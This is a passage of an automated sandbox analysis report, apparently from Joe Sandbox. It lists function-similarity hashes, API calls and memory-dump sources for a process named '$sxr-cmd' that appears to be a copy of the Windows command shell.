                                                                                                            • Instruction ID: 957e55b3236b31630e8495eedf17e6a93393b39c7a8b9c6551fc86e0b3620aef
                                                                                                            • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction Fuzzy Hash: 43318031201A61EAEB149F12E848F993B56F7A4BDCFA58054FE560B784CB38C948CB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswspace
                                                                                                            • String ID: off
                                                                                                            • API String ID: 2389812497-733764931
                                                                                                            • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                            • Instruction ID: 9178024a2cbd92f882dc6ced911bb2784ef0ddf2921bcaa6a582e6adf4693300
                                                                                                            • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                            • Instruction Fuzzy Hash: 78217C21E0CE5285FBE0BB159490279E6A8FF4DBA0F9C9034D96E67680DE2CE44C9221
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                            • String ID: %s=%s$DPATH$PATH
                                                                                                            • API String ID: 3731854180-3148396303
                                                                                                            • Opcode ID: 6e24d6ef11c6ecd66e01cca1666d6bf90257a2046feb6b4e08ff6718ab6fb53b
                                                                                                            • Instruction ID: a8c44cd6fb39bae69f94e9968c5475da500f4e7581f6eb4dd9ee3f1ec70fae2e
                                                                                                            • Opcode Fuzzy Hash: 6e24d6ef11c6ecd66e01cca1666d6bf90257a2046feb6b4e08ff6718ab6fb53b
                                                                                                            • Instruction Fuzzy Hash: 9F21C511B09E4384FFD0AB65E440276E3A4AF84BA0FC95135DD0D673A4DE2ED45C8770
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscmp
                                                                                                            • String ID: *.*$????????.???
                                                                                                            • API String ID: 3392835482-3870530610
                                                                                                            • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                            • Instruction ID: 9a679a507d20ce90fdcd79402019ad602badf2a34313ce6c9e4a2cf40b9b5d13
                                                                                                            • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                            • Instruction Fuzzy Hash: 53112525B24E6280E7E4AF26F480139B7A4FB48BA0F984030CE8D63B45DF3DF4498720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: fprintf
                                                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                            • API String ID: 383729395-2781220306
                                                                                                            • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                            • Instruction ID: b6ac8d7fb373e3bcb48a5d2f2f8caceaaf43ecf718665187af7500dd4d7b78de
                                                                                                            • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                            • Instruction Fuzzy Hash: AA119421A09D4285EBD5AB14E5400B9A2A1FB447B0FC44331D97D672E4EF2DE469C370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswspacewcschr
                                                                                                            • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                            • API String ID: 287713880-1183017076
                                                                                                            • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                            • Instruction ID: 21fadd518960526ff4cb7d24dd7f2fa4e39c3f8e3306b28204e7b8a7024690cb
                                                                                                            • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                            • Instruction Fuzzy Hash: DDF04F21A18E5285EBA1AB11A4C017AE6A4FF4CF60BC99231D96E63354EF2DE45CC620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                            • API String ID: 1646373207-2530943252
                                                                                                            • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                            • Instruction ID: 9bafe2cf8cd413594afe56ee5e10bf6362beb9f485456d2c2aae9720be5ad9d1
                                                                                                            • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                            • Instruction Fuzzy Hash: E1011E61E09E02D9EBD5AB14A891538E2A4FF49730FD50735C53E227E0DE7D656C8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
• Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
• Instruction ID: 9eeae631cf3cdc8019f0bd82827617a5809f444d6c120b500581f94547ff4a79
• Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
• Instruction Fuzzy Hash: 1CF03022618F81D6EB406B12F444079FB60FF89BE0B889534D94D17B14CF7DD469C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
• Opcode ID: 6d7e22519ad204417169069617a608dea1faeb656b6d76c54eaa8f80ef489a44
• Instruction ID: 81ecaa1c538bd717ef4efebe26dd5ce2f8aba8580d1bcb8b134750aa784f8b6f
• Opcode Fuzzy Hash: 6d7e22519ad204417169069617a608dea1faeb656b6d76c54eaa8f80ef489a44
• Instruction Fuzzy Hash: 2A619332A08B828AF790EB65E4802EDB7A4FB48768F944235DE5D27799DF38D45CC710
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
• Opcode ID: 14e2e029e2db4ad023fe39f4d0fdd58a578bfaa93e237b04781a15a7424acf6c
• Instruction ID: fdcae01c8e128d661820ee323d9e64998542845afccb571e0377de5adf9378af
• Opcode Fuzzy Hash: 14e2e029e2db4ad023fe39f4d0fdd58a578bfaa93e237b04781a15a7424acf6c
• Instruction Fuzzy Hash: 8C518215A0CE4281FBA0BF15A4401B9A2A5FF49FA0FD88531C96E37AD5DE2CD54D8370
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
• Opcode ID: 0baa5ef54deadc9fcc920d5a13933ba0048a94416471efdfea7fe696d0336e1b
• Instruction ID: 6bf6a2c46658116bcdf8625624e78c16eb2cfc40f427ded4cbb5ecbacc8580a3
• Opcode Fuzzy Hash: 0baa5ef54deadc9fcc920d5a13933ba0048a94416471efdfea7fe696d0336e1b
• Instruction Fuzzy Hash: 3D316D32619F828AEBA0EF11E8407E9B7A4FB88B94F844135DA4D57B54CF38D649C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
• Instruction ID: 271991f70b5ae7f8b735450bf3d01a96cb6566e1bbffd7de1f0979f9ec99afc8
• Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
• Instruction Fuzzy Hash: 6641B435A08F4289EB90AF18F880375E7A4FB88764F900136D99D52764EF7EE56CC720
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: wcstol$lstrcmp
• String ID:
• API String ID: 3515581199-0
• Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
• Instruction ID: f77109e7b7990efcb0ab0b845aed7f6a156466b809214244d8c1a46fae780fa2
• Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
• Instruction Fuzzy Hash: 8E21C132A08E5293E7A06F69A0D413AEEA8FB4D760F855134DB6F53A54CE6DE44CC620
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: File_get_osfhandle$TimeWrite
• String ID:
• API String ID: 4019809305-0
• Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
• Instruction ID: 86ccff35940b25d2e61221e022b8a3f53ed0764196ae8a260aebeb0e5d7d24da
• Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
• Instruction Fuzzy Hash: 96318122A08B4287E7E06B149480738E691BF49B70FD45238D95E67795CF7DD46C8630
Uniqueness
Uniqueness Score: -1.00%

APIs
Similarity
• API ID: memset$DriveNamePathTypeVolume
• String ID:
• API String ID: 1029679093-0
• Opcode ID: 6748089b4443443f9a7b5956cbfff3df7ba18ce7bcf44918d808dc6be18eadc0
• Instruction ID: 380294a737a415dd4f67ed1195f8825fd0f93e0cafe62696934ff6eda986818e
• Opcode Fuzzy Hash: 6748089b4443443f9a7b5956cbfff3df7ba18ce7bcf44918d808dc6be18eadc0
• Instruction Fuzzy Hash: 4C31AB32705F818AEBA09F21D8843E8B7A0FB89B94F844035CA5D5B744CF3DD659C720
Uniqueness
Uniqueness Score: -1.00%

APIs
                                                                                                            Similarity
                                                                                                            • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2448200120-0
                                                                                                            • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                            • Instruction ID: 5eaef96ef6a0a42dcf915e6372901be268c6147914e6e0a3a4189025fcd2f5da
                                                                                                            • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                            • Instruction Fuzzy Hash: 2D217C31A08F028BE7947B11A44017AF6A1FB89BA0F844135E90E27784CF3EE428CB70
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
• Instruction ID: 728a9af83dde2cbd332ebe61bc9142caeb7a6a62735bb5a116d95da25e8403d9
• Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
• Instruction Fuzzy Hash: 7221B861608F4186EB44AB51A540079FBA1FF8DBE0B849130DE2E63755DF3DE40D8730
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137F3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7137F3D0C
  • Part of subcall function 00007FF7137F3C24: towupper.MSVCRT ref: 00007FF7137F3D2F
  • Part of subcall function 00007FF7137F3C24: iswalpha.MSVCRT ref: 00007FF7137F3D4F
  • Part of subcall function 00007FF7137F3C24: towupper.MSVCRT ref: 00007FF7137F3D75
  • Part of subcall function 00007FF7137F3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F3DBF
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6ABF
• RtlFreeHeap.NTDLL(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6AD3
  • Part of subcall function 00007FF7137E6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7137E6AE8,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B8B
  • Part of subcall function 00007FF7137E6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7137E6AE8,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B97
  • Part of subcall function 00007FF7137E6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF7137E6AE8,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6BAF
  • Part of subcall function 00007FF7137E6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E6AF1,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B39
  • Part of subcall function 00007FF7137E6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF7137E6AF1,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B4D
  • Part of subcall function 00007FF7137E6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137E6AF1,?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925), ref: 00007FF7137E6B59
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6B03
• RtlFreeHeap.NTDLL(?,?,?,00007FF71380EA0F,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137E6B17
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
• String ID:
• API String ID: 3512109576-0
• Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
• Instruction ID: 731034cc1d6e13a39e0f41232fd60d2a57bfa8ef6fe3322070c527bae552a847
• Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
• Instruction Fuzzy Hash: 0721A122A09E8285EB84BB65D4502B8BBE1EF5DB64F948135C90E27351DF3DE45DC730
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB6D0
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB6E7
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB701
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EAF82), ref: 00007FF7137EB715
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$AllocSize
• String ID:
• API String ID: 2549470565-0
• Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
• Instruction ID: a97f3293afb1b94a9ad5a9cbf4f5139a872fdb44371a3507ca758b9eb079b436
• Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
• Instruction Fuzzy Hash: 7921366290DE42C6EB95AB51E480078EA91FF4CBA0BC89536DA4E23B54DF3CD45DD730
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D01C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D033
• FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D06D
• SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7137F507A), ref: 00007FF71380D07F
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
• String ID:
• API String ID: 1033415088-0
• Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
• Instruction ID: a39cfa7076a43273d335208b09b9e3e5488a839591ce6610f718afe0e5feb89f
• Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
• Instruction Fuzzy Hash: ED116331618A4287DB845B10F05417AF7E0FB8ABA5F805135EA8E57B54DF7DD0598B20
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
